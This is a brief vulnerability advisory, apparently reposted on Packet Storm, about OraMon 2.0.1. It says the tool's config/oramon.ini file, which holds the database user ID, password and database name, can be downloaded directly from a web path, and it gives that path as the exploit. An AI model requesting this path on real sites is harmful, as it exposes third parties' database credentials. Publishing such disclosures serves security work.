OraMon version 2.0.1 suffers from a remote configuration file disclosure vulnerability.
5219239d7b4f352e07fe99b998823402........................
..............................................
+++++Bypass Config Download Vulnerability+++++
...............................................
script:Oramon = Oracle Database Monitoring
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
download:http://www.oramon.org/downloads/oramon.tar.gz
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
expl:
$USERID=
$PASSWORD=
$DATABASE=
www.site.com/path/config/oramon.ini
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
| | | | | |
Author: ahmadbady
| | | | | |
my mail: kivi_hacker666@yahoo.com | | | | | |
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!